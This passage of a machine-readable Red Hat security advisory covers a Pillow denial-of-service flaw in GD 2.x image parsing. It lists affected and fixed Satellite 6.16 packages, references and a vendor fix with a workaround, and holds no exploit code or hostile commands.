"9Base-satellite-6.16:rubygem-nokogiri-0:1.15.7-3.el9sat.src",
"9Base-satellite-6.16:rubygem-nokogiri-0:1.15.7-3.el9sat.x86_64",
"9Base-satellite-6.16:rubygem-nokogiri-debuginfo-0:1.15.7-3.el9sat.x86_64",
"9Base-satellite-6.16:rubygem-nokogiri-debugsource-0:1.15.7-3.el9sat.x86_64",
"9Base-satellite-6.16:satellite-0:6.16.12-1.el9sat.noarch",
"9Base-satellite-6.16:satellite-0:6.16.12-1.el9sat.src",
"9Base-satellite-6.16:satellite-cli-0:6.16.12-1.el9sat.noarch",
"9Base-satellite-6.16:satellite-common-0:6.16.12-1.el9sat.noarch",
"9Base-satellite-6.16:scap-security-guide-satellite-0:1.0.6-1.el9sat.noarch",
"9Base-satellite-6.16:scap-security-guide-satellite-0:1.0.6-1.el9sat.src"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2497455"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in Pillow, a Python imaging library. A remote attacker could exploit this vulnerability by providing a specially crafted GD 2.x image file. The GdImageFile._open() function reads image dimensions without proper validation, leading to excessive memory allocation. This can result in a Denial of Service (DoS) due to C-heap exhaustion.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "python-pillow: Pillow: Denial of Service via crafted GD 2.x image file",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "A denial-of-service vulnerability was found in Pillow\u0027s GdImageFile plugin. The GdImageFile._open() function reads image dimensions from GD 2.x file headers and stores them without performing a decompression bomb check. A crafted .gd file of approximately 1 KB can trigger an unchecked 4.3 GB C-heap allocation, potentially crashing the process or exhausting memory on systems with insufficient resources. This issue is fixed in Pillow 12.3.0.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"8Base-satellite-6.16-capsule:python-pillow-0:12.3.0-1.el8pc.src",
"8Base-satellite-6.16-capsule:python-pillow-debugsource-0:12.3.0-1.el8pc.x86_64",
"8Base-satellite-6.16-capsule:python3.11-pillow-0:12.3.0-1.el8pc.x86_64",
"8Base-satellite-6.16-capsule:python3.11-pillow-debuginfo-0:12.3.0-1.el8pc.x86_64",
"8Base-satellite-6.16:python-pillow-0:12.3.0-1.el8pc.src",
"8Base-satellite-6.16:python-pillow-debugsource-0:12.3.0-1.el8pc.x86_64",
"8Base-satellite-6.16:python3.11-pillow-0:12.3.0-1.el8pc.x86_64",
"8Base-satellite-6.16:python3.11-pillow-debuginfo-0:12.3.0-1.el8pc.x86_64",
"9Base-satellite-6.16-capsule:python-pillow-0:12.3.0-1.el9pc.src",
"9Base-satellite-6.16-capsule:python-pillow-debugsource-0:12.3.0-1.el9pc.x86_64",
"9Base-satellite-6.16-capsule:python3.11-pillow-0:12.3.0-1.el9pc.x86_64",
"9Base-satellite-6.16-capsule:python3.11-pillow-debuginfo-0:12.3.0-1.el9pc.x86_64",
"9Base-satellite-6.16:python-pillow-0:12.3.0-1.el9pc.src",
"9Base-satellite-6.16:python-pillow-debugsource-0:12.3.0-1.el9pc.x86_64",
"9Base-satellite-6.16:python3.11-pillow-0:12.3.0-1.el9pc.x86_64",
"9Base-satellite-6.16:python3.11-pillow-debuginfo-0:12.3.0-1.el9pc.x86_64"
],
"known_not_affected": [
"8Base-satellite-6.16-capsule:foreman-installer-1:3.12.0.8-1.el8sat.noarch",
"8Base-satellite-6.16-capsule:foreman-installer-1:3.12.0.8-1.el8sat.src",
"8Base-satellite-6.16-capsule:foreman-installer-katello-1:3.12.0.8-1.el8sat.noarch",
"8Base-satellite-6.16-capsule:libsolv-1:0.7.20-7.el8sat.src",
"8Base-satellite-6.16-capsule:libsolv-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16-capsule:libsolv-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16-capsule:libsolv-debugsource-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16-capsule:libsolv-demo-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16-capsule:libsolv-tools-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16-capsule:openvox-agent-0:8.24.1-3.el8sat.src",
"8Base-satellite-6.16-capsule:openvox-agent-0:8.24.1-3.el8sat.x86_64",
"8Base-satellite-6.16-capsule:openvox-server-0:8.14.1-1.el8sat.noarch",
"8Base-satellite-6.16-capsule:openvox-server-0:8.14.1-1.el8sat.src",
"8Base-satellite-6.16-capsule:perl-solv-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16-capsule:python-pulp-container-0:2.20.10-2.el8pc.src",
"8Base-satellite-6.16-capsule:python-pyjwt-0:2.13.0-1.el8pc.src",
"8Base-satellite-6.16-capsule:python-pysequoia-0:0.1.33-1.el8pc.src",
"8Base-satellite-6.16-capsule:python3-solv-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16-capsule:python3-solv-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16-capsule:python3.11-pulp-container-0:2.20.10-2.el8pc.noarch",
"8Base-satellite-6.16-capsule:python3.11-pyjwt+crypto-0:2.13.0-1.el8pc.noarch",
"8Base-satellite-6.16-capsule:python3.11-pyjwt-0:2.13.0-1.el8pc.noarch",
"8Base-satellite-6.16-capsule:python3.11-pysequoia-0:0.1.33-1.el8pc.x86_64",
"8Base-satellite-6.16-capsule:ruby-solv-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16-capsule:rubygem-faraday-0:1.10.6-1.el8sat.noarch",
"8Base-satellite-6.16-capsule:rubygem-faraday-0:1.10.6-1.el8sat.src",
"8Base-satellite-6.16-capsule:rubygem-foreman_maintain-1:1.7.15-1.el8sat.noarch",
"8Base-satellite-6.16-capsule:rubygem-foreman_maintain-1:1.7.15-1.el8sat.src",
"8Base-satellite-6.16-capsule:rubygem-nokogiri-0:1.15.7-3.el8sat.src",
"8Base-satellite-6.16-capsule:rubygem-nokogiri-0:1.15.7-3.el8sat.x86_64",
"8Base-satellite-6.16-capsule:rubygem-nokogiri-debuginfo-0:1.15.7-3.el8sat.x86_64",
"8Base-satellite-6.16-capsule:rubygem-nokogiri-debugsource-0:1.15.7-3.el8sat.x86_64",
"8Base-satellite-6.16-capsule:satellite-0:6.16.12-1.el8sat.src",
"8Base-satellite-6.16-capsule:satellite-capsule-0:6.16.12-1.el8sat.noarch",
"8Base-satellite-6.16-capsule:satellite-common-0:6.16.12-1.el8sat.noarch",
"8Base-satellite-6.16-maintenance:rubygem-foreman_maintain-1:1.7.15-1.el8sat.noarch",
"8Base-satellite-6.16-maintenance:rubygem-foreman_maintain-1:1.7.15-1.el8sat.src",
"8Base-satellite-6.16-utils:satellite-0:6.16.12-1.el8sat.src",
"8Base-satellite-6.16-utils:satellite-cli-0:6.16.12-1.el8sat.noarch",
"8Base-satellite-6.16:foreman-installer-1:3.12.0.8-1.el8sat.noarch",
"8Base-satellite-6.16:foreman-installer-1:3.12.0.8-1.el8sat.src",
"8Base-satellite-6.16:foreman-installer-katello-1:3.12.0.8-1.el8sat.noarch",
"8Base-satellite-6.16:libsolv-1:0.7.20-7.el8sat.src",
"8Base-satellite-6.16:libsolv-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16:libsolv-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16:libsolv-debugsource-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16:libsolv-demo-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16:libsolv-tools-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16:openvox-agent-0:8.24.1-3.el8sat.src",
"8Base-satellite-6.16:openvox-agent-0:8.24.1-3.el8sat.x86_64",
"8Base-satellite-6.16:openvox-server-0:8.14.1-1.el8sat.noarch",
"8Base-satellite-6.16:openvox-server-0:8.14.1-1.el8sat.src",
"8Base-satellite-6.16:perl-solv-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16:python-pulp-container-0:2.20.10-2.el8pc.src",
"8Base-satellite-6.16:python-pyjwt-0:2.13.0-1.el8pc.src",
"8Base-satellite-6.16:python-pysequoia-0:0.1.33-1.el8pc.src",
"8Base-satellite-6.16:python3-solv-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16:python3-solv-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16:python3.11-pulp-container-0:2.20.10-2.el8pc.noarch",
"8Base-satellite-6.16:python3.11-pyjwt+crypto-0:2.13.0-1.el8pc.noarch",
"8Base-satellite-6.16:python3.11-pyjwt-0:2.13.0-1.el8pc.noarch",
"8Base-satellite-6.16:python3.11-pysequoia-0:0.1.33-1.el8pc.x86_64",
"8Base-satellite-6.16:ruby-solv-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16:rubygem-faraday-0:1.10.6-1.el8sat.noarch",
"8Base-satellite-6.16:rubygem-faraday-0:1.10.6-1.el8sat.src",
"8Base-satellite-6.16:rubygem-foreman_maintain-1:1.7.15-1.el8sat.noarch",
"8Base-satellite-6.16:rubygem-foreman_maintain-1:1.7.15-1.el8sat.src",
"8Base-satellite-6.16:rubygem-katello-0:4.14.0.21-1.el8sat.noarch",
"8Base-satellite-6.16:rubygem-katello-0:4.14.0.21-1.el8sat.src",
"8Base-satellite-6.16:rubygem-nokogiri-0:1.15.7-3.el8sat.src",
"8Base-satellite-6.16:rubygem-nokogiri-0:1.15.7-3.el8sat.x86_64",
"8Base-satellite-6.16:rubygem-nokogiri-debuginfo-0:1.15.7-3.el8sat.x86_64",
"8Base-satellite-6.16:rubygem-nokogiri-debugsource-0:1.15.7-3.el8sat.x86_64",
"8Base-satellite-6.16:satellite-0:6.16.12-1.el8sat.noarch",
"8Base-satellite-6.16:satellite-0:6.16.12-1.el8sat.src",
"8Base-satellite-6.16:satellite-cli-0:6.16.12-1.el8sat.noarch",
"8Base-satellite-6.16:satellite-common-0:6.16.12-1.el8sat.noarch",
"8Base-satellite-6.16:scap-security-guide-satellite-0:1.0.6-1.el8sat.noarch",
"8Base-satellite-6.16:scap-security-guide-satellite-0:1.0.6-1.el8sat.src",
"9Base-satellite-6.16-capsule:foreman-installer-1:3.12.0.8-1.el9sat.noarch",
"9Base-satellite-6.16-capsule:foreman-installer-1:3.12.0.8-1.el9sat.src",
"9Base-satellite-6.16-capsule:foreman-installer-katello-1:3.12.0.8-1.el9sat.noarch",
"9Base-satellite-6.16-capsule:openvox-agent-0:8.24.1-3.el9sat.src",
"9Base-satellite-6.16-capsule:openvox-agent-0:8.24.1-3.el9sat.x86_64",
"9Base-satellite-6.16-capsule:openvox-server-0:8.14.1-1.el9sat.noarch",
"9Base-satellite-6.16-capsule:openvox-server-0:8.14.1-1.el9sat.src",
"9Base-satellite-6.16-capsule:python-pulp-container-0:2.20.10-2.el9pc.src",
"9Base-satellite-6.16-capsule:python-pyjwt-0:2.13.0-1.el9pc.src",
"9Base-satellite-6.16-capsule:python-pysequoia-0:0.1.33-1.el9pc.src",
"9Base-satellite-6.16-capsule:python3.11-pulp-container-0:2.20.10-2.el9pc.noarch",
"9Base-satellite-6.16-capsule:python3.11-pyjwt+crypto-0:2.13.0-1.el9pc.noarch",
"9Base-satellite-6.16-capsule:python3.11-pyjwt-0:2.13.0-1.el9pc.noarch",
"9Base-satellite-6.16-capsule:python3.11-pysequoia-0:0.1.33-1.el9pc.x86_64",
"9Base-satellite-6.16-capsule:rubygem-faraday-0:1.10.6-1.el9sat.noarch",
"9Base-satellite-6.16-capsule:rubygem-faraday-0:1.10.6-1.el9sat.src",
"9Base-satellite-6.16-capsule:rubygem-foreman_maintain-1:1.7.15-1.el9sat.noarch",
"9Base-satellite-6.16-capsule:rubygem-foreman_maintain-1:1.7.15-1.el9sat.src",
"9Base-satellite-6.16-capsule:rubygem-nokogiri-0:1.15.7-3.el9sat.src",
"9Base-satellite-6.16-capsule:rubygem-nokogiri-0:1.15.7-3.el9sat.x86_64",
"9Base-satellite-6.16-capsule:rubygem-nokogiri-debuginfo-0:1.15.7-3.el9sat.x86_64",
"9Base-satellite-6.16-capsule:rubygem-nokogiri-debugsource-0:1.15.7-3.el9sat.x86_64",
"9Base-satellite-6.16-capsule:satellite-0:6.16.12-1.el9sat.src",
"9Base-satellite-6.16-capsule:satellite-capsule-0:6.16.12-1.el9sat.noarch",
"9Base-satellite-6.16-capsule:satellite-common-0:6.16.12-1.el9sat.noarch",
"9Base-satellite-6.16-maintenance:rubygem-foreman_maintain-1:1.7.15-1.el9sat.noarch",
"9Base-satellite-6.16-maintenance:rubygem-foreman_maintain-1:1.7.15-1.el9sat.src",
"9Base-satellite-6.16-utils:satellite-0:6.16.12-1.el9sat.src",
"9Base-satellite-6.16-utils:satellite-cli-0:6.16.12-1.el9sat.noarch",
"9Base-satellite-6.16:foreman-installer-1:3.12.0.8-1.el9sat.noarch",
"9Base-satellite-6.16:foreman-installer-1:3.12.0.8-1.el9sat.src",
"9Base-satellite-6.16:foreman-installer-katello-1:3.12.0.8-1.el9sat.noarch",
"9Base-satellite-6.16:openvox-agent-0:8.24.1-3.el9sat.src",
"9Base-satellite-6.16:openvox-agent-0:8.24.1-3.el9sat.x86_64",
"9Base-satellite-6.16:openvox-server-0:8.14.1-1.el9sat.noarch",
"9Base-satellite-6.16:openvox-server-0:8.14.1-1.el9sat.src",
"9Base-satellite-6.16:python-pulp-container-0:2.20.10-2.el9pc.src",
"9Base-satellite-6.16:python-pyjwt-0:2.13.0-1.el9pc.src",
"9Base-satellite-6.16:python-pysequoia-0:0.1.33-1.el9pc.src",
"9Base-satellite-6.16:python3.11-pulp-container-0:2.20.10-2.el9pc.noarch",
"9Base-satellite-6.16:python3.11-pyjwt+crypto-0:2.13.0-1.el9pc.noarch",
"9Base-satellite-6.16:python3.11-pyjwt-0:2.13.0-1.el9pc.noarch",
"9Base-satellite-6.16:python3.11-pysequoia-0:0.1.33-1.el9pc.x86_64",
"9Base-satellite-6.16:rubygem-faraday-0:1.10.6-1.el9sat.noarch",
"9Base-satellite-6.16:rubygem-faraday-0:1.10.6-1.el9sat.src",
"9Base-satellite-6.16:rubygem-foreman_maintain-1:1.7.15-1.el9sat.noarch",
"9Base-satellite-6.16:rubygem-foreman_maintain-1:1.7.15-1.el9sat.src",
"9Base-satellite-6.16:rubygem-katello-0:4.14.0.21-1.el9sat.noarch",
"9Base-satellite-6.16:rubygem-katello-0:4.14.0.21-1.el9sat.src",
"9Base-satellite-6.16:rubygem-nokogiri-0:1.15.7-3.el9sat.src",
"9Base-satellite-6.16:rubygem-nokogiri-0:1.15.7-3.el9sat.x86_64",
"9Base-satellite-6.16:rubygem-nokogiri-debuginfo-0:1.15.7-3.el9sat.x86_64",
"9Base-satellite-6.16:rubygem-nokogiri-debugsource-0:1.15.7-3.el9sat.x86_64",
"9Base-satellite-6.16:satellite-0:6.16.12-1.el9sat.noarch",
"9Base-satellite-6.16:satellite-0:6.16.12-1.el9sat.src",
"9Base-satellite-6.16:satellite-cli-0:6.16.12-1.el9sat.noarch",
"9Base-satellite-6.16:satellite-common-0:6.16.12-1.el9sat.noarch",
"9Base-satellite-6.16:scap-security-guide-satellite-0:1.0.6-1.el9sat.noarch",
"9Base-satellite-6.16:scap-security-guide-satellite-0:1.0.6-1.el9sat.src"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-55380"
},
{
"category": "external",
"summary": "RHBZ#2497455",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2497455"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-55380",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-55380"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-55380",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-55380"
},
{
"category": "external",
"summary": "https://github.com/python-pillow/Pillow/blob/main/docs/releasenotes/12.3.0.rst",
"url": "https://github.com/python-pillow/Pillow/blob/main/docs/releasenotes/12.3.0.rst"
},
{
"category": "external",
"summary": "https://github.com/python-pillow/Pillow/commit/f39b0ae6624eb2d7c5c5d651d9bb5fdbd96a8675",
"url": "https://github.com/python-pillow/Pillow/commit/f39b0ae6624eb2d7c5c5d651d9bb5fdbd96a8675"
},
{
"category": "external",
"summary": "https://github.com/python-pillow/Pillow/security/advisories/GHSA-phj9-mv4w-65pm",
"url": "https://github.com/python-pillow/Pillow/security/advisories/GHSA-phj9-mv4w-65pm"
}
],
"release_date": "2026-07-06T18:50:14.789000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-08-04T16:04:50+00:00",
"details": "Before applying this update, make sure all previously released errata\nrelevant to your system have been applied.\n\nFor detailed instructions how to apply this update, refer to:\n\nhttps://docs.redhat.com/en/documentation/red_hat_satellite/6.16/html/updating_red_hat_satellite/index",
"product_ids": [
"8Base-satellite-6.16-capsule:python-pillow-0:12.3.0-1.el8pc.src",
"8Base-satellite-6.16-capsule:python-pillow-debugsource-0:12.3.0-1.el8pc.x86_64",
"8Base-satellite-6.16-capsule:python3.11-pillow-0:12.3.0-1.el8pc.x86_64",
"8Base-satellite-6.16-capsule:python3.11-pillow-debuginfo-0:12.3.0-1.el8pc.x86_64",
"8Base-satellite-6.16:python-pillow-0:12.3.0-1.el8pc.src",
"8Base-satellite-6.16:python-pillow-debugsource-0:12.3.0-1.el8pc.x86_64",
"8Base-satellite-6.16:python3.11-pillow-0:12.3.0-1.el8pc.x86_64",
"8Base-satellite-6.16:python3.11-pillow-debuginfo-0:12.3.0-1.el8pc.x86_64",
"9Base-satellite-6.16-capsule:python-pillow-0:12.3.0-1.el9pc.src",
"9Base-satellite-6.16-capsule:python-pillow-debugsource-0:12.3.0-1.el9pc.x86_64",
"9Base-satellite-6.16-capsule:python3.11-pillow-0:12.3.0-1.el9pc.x86_64",
"9Base-satellite-6.16-capsule:python3.11-pillow-debuginfo-0:12.3.0-1.el9pc.x86_64",
"9Base-satellite-6.16:python-pillow-0:12.3.0-1.el9pc.src",
"9Base-satellite-6.16:python-pillow-debugsource-0:12.3.0-1.el9pc.x86_64",
"9Base-satellite-6.16:python3.11-pillow-0:12.3.0-1.el9pc.x86_64",
"9Base-satellite-6.16:python3.11-pillow-debuginfo-0:12.3.0-1.el9pc.x86_64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:50223"
},
{
"category": "workaround",
"details": "Avoid processing untrusted GD 2.x image files with PIL.GdImageFile.open(). Use Image.open() instead, which includes decompression bomb protections for supported formats. If GdImageFile must be used, validate the image dimensions before calling load(). Restricting accepted image formats at the application boundary to only those explicitly needed can reduce exposure.",
"product_ids": [
"8Base-satellite-6.16-capsule:foreman-installer-1:3.12.0.8-1.el8sat.noarch",
"8Base-satellite-6.16-capsule:foreman-installer-1:3.12.0.8-1.el8sat.src",
"8Base-satellite-6.16-capsule:foreman-installer-katello-1:3.12.0.8-1.el8sat.noarch",
"8Base-satellite-6.16-capsule:libsolv-1:0.7.20-7.el8sat.src",
"8Base-satellite-6.16-capsule:libsolv-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16-capsule:libsolv-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16-capsule:libsolv-debugsource-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16-capsule:libsolv-demo-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16-capsule:libsolv-tools-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16-capsule:openvox-agent-0:8.24.1-3.el8sat.src",
"8Base-satellite-6.16-capsule:openvox-agent-0:8.24.1-3.el8sat.x86_64",
"8Base-satellite-6.16-capsule:openvox-server-0:8.14.1-1.el8sat.noarch",
"8Base-satellite-6.16-capsule:openvox-server-0:8.14.1-1.el8sat.src",
"8Base-satellite-6.16-capsule:perl-solv-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16-capsule:python-pillow-0:12.3.0-1.el8pc.src",
"8Base-satellite-6.16-capsule:python-pillow-debugsource-0:12.3.0-1.el8pc.x86_64",
"8Base-satellite-6.16-capsule:python-pulp-container-0:2.20.10-2.el8pc.src",
"8Base-satellite-6.16-capsule:python-pyjwt-0:2.13.0-1.el8pc.src",
"8Base-satellite-6.16-capsule:python-pysequoia-0:0.1.33-1.el8pc.src",
"8Base-satellite-6.16-capsule:python3-solv-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16-capsule:python3-solv-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16-capsule:python3.11-pillow-0:12.3.0-1.el8pc.x86_64",
"8Base-satellite-6.16-capsule:python3.11-pillow-debuginfo-0:12.3.0-1.el8pc.x86_64",
"8Base-satellite-6.16-capsule:python3.11-pulp-container-0:2.20.10-2.el8pc.noarch",
"8Base-satellite-6.16-capsule:python3.11-pyjwt+crypto-0:2.13.0-1.el8pc.noarch",
"8Base-satellite-6.16-capsule:python3.11-pyjwt-0:2.13.0-1.el8pc.noarch",
"8Base-satellite-6.16-capsule:python3.11-pysequoia-0:0.1.33-1.el8pc.x86_64",
"8Base-satellite-6.16-capsule:ruby-solv-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16-capsule:rubygem-faraday-0:1.10.6-1.el8sat.noarch",
"8Base-satellite-6.16-capsule:rubygem-faraday-0:1.10.6-1.el8sat.src",
"8Base-satellite-6.16-capsule:rubygem-foreman_maintain-1:1.7.15-1.el8sat.noarch",
"8Base-satellite-6.16-capsule:rubygem-foreman_maintain-1:1.7.15-1.el8sat.src",
"8Base-satellite-6.16-capsule:rubygem-nokogiri-0:1.15.7-3.el8sat.src",
"8Base-satellite-6.16-capsule:rubygem-nokogiri-0:1.15.7-3.el8sat.x86_64",
"8Base-satellite-6.16-capsule:rubygem-nokogiri-debuginfo-0:1.15.7-3.el8sat.x86_64",
"8Base-satellite-6.16-capsule:rubygem-nokogiri-debugsource-0:1.15.7-3.el8sat.x86_64",
"8Base-satellite-6.16-capsule:satellite-0:6.16.12-1.el8sat.src",
"8Base-satellite-6.16-capsule:satellite-capsule-0:6.16.12-1.el8sat.noarch",
"8Base-satellite-6.16-capsule:satellite-common-0:6.16.12-1.el8sat.noarch",
"8Base-satellite-6.16-maintenance:rubygem-foreman_maintain-1:1.7.15-1.el8sat.noarch",
"8Base-satellite-6.16-maintenance:rubygem-foreman_maintain-1:1.7.15-1.el8sat.src",
"8Base-satellite-6.16-utils:satellite-0:6.16.12-1.el8sat.src",
"8Base-satellite-6.16-utils:satellite-cli-0:6.16.12-1.el8sat.noarch",
"8Base-satellite-6.16:foreman-installer-1:3.12.0.8-1.el8sat.noarch",
"8Base-satellite-6.16:foreman-installer-1:3.12.0.8-1.el8sat.src",
"8Base-satellite-6.16:foreman-installer-katello-1:3.12.0.8-1.el8sat.noarch",
"8Base-satellite-6.16:libsolv-1:0.7.20-7.el8sat.src",
"8Base-satellite-6.16:libsolv-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16:libsolv-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16:libsolv-debugsource-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16:libsolv-demo-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16:libsolv-tools-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16:openvox-agent-0:8.24.1-3.el8sat.src",
"8Base-satellite-6.16:openvox-agent-0:8.24.1-3.el8sat.x86_64",
"8Base-satellite-6.16:openvox-server-0:8.14.1-1.el8sat.noarch",
"8Base-satellite-6.16:openvox-server-0:8.14.1-1.el8sat.src",
"8Base-satellite-6.16:perl-solv-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16:python-pillow-0:12.3.0-1.el8pc.src",
"8Base-satellite-6.16:python-pillow-debugsource-0:12.3.0-1.el8pc.x86_64",
"8Base-satellite-6.16:python-pulp-container-0:2.20.10-2.el8pc.src",
"8Base-satellite-6.16:python-pyjwt-0:2.13.0-1.el8pc.src",
"8Base-satellite-6.16:python-pysequoia-0:0.1.33-1.el8pc.src",
"8Base-satellite-6.16:python3-solv-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16:python3-solv-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16:python3.11-pillow-0:12.3.0-1.el8pc.x86_64",
"8Base-satellite-6.16:python3.11-pillow-debuginfo-0:12.3.0-1.el8pc.x86_64",
"8Base-satellite-6.16:python3.11-pulp-container-0:2.20.10-2.el8pc.noarch",
"8Base-satellite-6.16:python3.11-pyjwt+crypto-0:2.13.0-1.el8pc.noarch",
"8Base-satellite-6.16:python3.11-pyjwt-0:2.13.0-1.el8pc.noarch",
"8Base-satellite-6.16:python3.11-pysequoia-0:0.1.33-1.el8pc.x86_64",
"8Base-satellite-6.16:ruby-solv-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16:rubygem-faraday-0:1.10.6-1.el8sat.noarch",
"8Base-satellite-6.16:rubygem-faraday-0:1.10.6-1.el8sat.src",
"8Base-satellite-6.16:rubygem-foreman_maintain-1:1.7.15-1.el8sat.noarch",
"8Base-satellite-6.16:rubygem-foreman_maintain-1:1.7.15-1.el8sat.src",
"8Base-satellite-6.16:rubygem-katello-0:4.14.0.21-1.el8sat.noarch",
"8Base-satellite-6.16:rubygem-katello-0:4.14.0.21-1.el8sat.src",
"8Base-satellite-6.16:rubygem-nokogiri-0:1.15.7-3.el8sat.src",
"8Base-satellite-6.16:rubygem-nokogiri-0:1.15.7-3.el8sat.x86_64",
"8Base-satellite-6.16:rubygem-nokogiri-debuginfo-0:1.15.7-3.el8sat.x86_64",
"8Base-satellite-6.16:rubygem-nokogiri-debugsource-0:1.15.7-3.el8sat.x86_64",
"8Base-satellite-6.16:satellite-0:6.16.12-1.el8sat.noarch",
"8Base-satellite-6.16:satellite-0:6.16.12-1.el8sat.src",
"8Base-satellite-6.16:satellite-cli-0:6.16.12-1.el8sat.noarch",
"8Base-satellite-6.16:satellite-common-0:6.16.12-1.el8sat.noarch",
"8Base-satellite-6.16:scap-security-guide-satellite-0:1.0.6-1.el8sat.noarch",
"8Base-satellite-6.16:scap-security-guide-satellite-0:1.0.6-1.el8sat.src",
"9Base-satellite-6.16-capsule:foreman-installer-1:3.12.0.8-1.el9sat.noarch",
"9Base-satellite-6.16-capsule:foreman-installer-1:3.12.0.8-1.el9sat.src",
"9Base-satellite-6.16-capsule:foreman-installer-katello-1:3.12.0.8-1.el9sat.noarch",
"9Base-satellite-6.16-capsule:openvox-agent-0:8.24.1-3.el9sat.src",
"9Base-satellite-6.16-capsule:openvox-agent-0:8.24.1-3.el9sat.x86_64",
"9Base-satellite-6.16-capsule:openvox-server-0:8.14.1-1.el9sat.noarch",
"9Base-satellite-6.16-capsule:openvox-server-0:8.14.1-1.el9sat.src",
"9Base-satellite-6.16-capsule:python-pillow-0:12.3.0-1.el9pc.src",
"9Base-satellite-6.16-capsule:python-pillow-debugsource-0:12.3.0-1.el9pc.x86_64",
"9Base-satellite-6.16-capsule:python-pulp-container-0:2.20.10-2.el9pc.src",
"9Base-satellite-6.16-capsule:python-pyjwt-0:2.13.0-1.el9pc.src",
"9Base-satellite-6.16-capsule:python-pysequoia-0:0.1.33-1.el9pc.src",
"9Base-satellite-6.16-capsule:python3.11-pillow-0:12.3.0-1.el9pc.x86_64",
"9Base-satellite-6.16-capsule:python3.11-pillow-debuginfo-0:12.3.0-1.el9pc.x86_64",
"9Base-satellite-6.16-capsule:python3.11-pulp-container-0:2.20.10-2.el9pc.noarch",
"9Base-satellite-6.16-capsule:python3.11-pyjwt+crypto-0:2.13.0-1.el9pc.noarch",
"9Base-satellite-6.16-capsule:python3.11-pyjwt-0:2.13.0-1.el9pc.noarch",
"9Base-satellite-6.16-capsule:python3.11-pysequoia-0:0.1.33-1.el9pc.x86_64",
"9Base-satellite-6.16-capsule:rubygem-faraday-0:1.10.6-1.el9sat.noarch",
"9Base-satellite-6.16-capsule:rubygem-faraday-0:1.10.6-1.el9sat.src",
"9Base-satellite-6.16-capsule:rubygem-foreman_maintain-1:1.7.15-1.el9sat.noarch",
"9Base-satellite-6.16-capsule:rubygem-foreman_maintain-1:1.7.15-1.el9sat.src",
"9Base-satellite-6.16-capsule:rubygem-nokogiri-0:1.15.7-3.el9sat.src",
"9Base-satellite-6.16-capsule:rubygem-nokogiri-0:1.15.7-3.el9sat.x86_64",
"9Base-satellite-6.16-capsule:rubygem-nokogiri-debuginfo-0:1.15.7-3.el9sat.x86_64",
"9Base-satellite-6.16-capsule:rubygem-nokogiri-debugsource-0:1.15.7-3.el9sat.x86_64",
"9Base-satellite-6.16-capsule:satellite-0:6.16.12-1.el9sat.src",
"9Base-satellite-6.16-capsule:satellite-capsule-0:6.16.12-1.el9sat.noarch",
"9Base-satellite-6.16-capsule:satellite-common-0:6.16.12-1.el9sat.noarch",
"9Base-satellite-6.16-maintenance:rubygem-foreman_maintain-1:1.7.15-1.el9sat.noarch",
"9Base-satellite-6.16-maintenance:rubygem-foreman_maintain-1:1.7.15-1.el9sat.src",
"9Base-satellite-6.16-utils:satellite-0:6.16.12-1.el9sat.src",
"9Base-satellite-6.16-utils:satellite-cli-0:6.16.12-1.el9sat.noarch",
